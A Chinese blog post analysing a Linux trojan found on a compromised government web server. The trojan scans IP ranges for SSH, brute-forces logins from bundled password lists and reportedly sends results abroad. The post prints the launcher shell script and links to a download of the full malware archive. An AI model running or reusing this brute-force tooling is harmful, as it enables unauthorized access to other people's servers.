一个Linux下的木马程序样本
从某政府部门门户站点抓取出来了,应该是通过弱密码猜测获得了系统登录权限,然后植入了该木马。
这个木马的主要目的是通过扫描某一个网段的IP地址,嗅探哪些IP开放了22端口(sshd服务),然后保存这些IP地址,而后一句木马自带的5个字典文件进行暴力猜解,而后把结果传输到瑞典(通过IP获得的地理位置)的一台服务器上。
整个目录由一个简单的shell脚本发起,对系统本身没有侵害作用,但是扫描和猜测过程中,将消耗系统大部分的网络带宽。
下面的是木马发起的shell脚本程序
#!/bin/bash if [ $# != 1 ]; then echo "[+] Folosim : $0 [b class]" exit; fi echo "[+] Pirated edition. [+]" echo "[+]******************************[+]" echo "[+]********** Made By Joker *****[+]" echo "[+]*********In #LinuxCrackers****[+]" ./find $1 22 sleep 10 cat $1.find.22 |sort |uniq > ip.conf oopsnr2=`grep -c . ip.conf` echo "[+] Here we go" echo "[+] Am gasit $oopsnr2 de servere." echo "[+] Let s see what we got" echo "Checking..." cp 1 data.conf echo "Checking 1st pass file" sleep 3 ./atack 800 cp 2 data.conf echo "Checking 2nd pass file" sleep 3 ./atack 800 cp 3 data.conf echo "Checking 3rd pass file" sleep 3 ./atack 800 cp 4 data.conf echo "Checking 4th pass file" sleep 3 ./atack 800 cp 5 data.conf echo "Cheking 5th pass file" sleep 3 ./atack 800 rm -rf $1.find.22 ip.conf echo "[+] nothing here"
更详细的内容,你可以下载该木马进行分析。
http://dl.getdropbox.com/u/220586/joker.tgz
原创文章,转载请注明: 转载自Linux|系统管理|WEB开发
本文链接地址: 一个Linux下的木马程序样本
你本人做门户网站的审计不,哇哈哈~~
@fay
咋的,有生意?
这个得记下来研究研究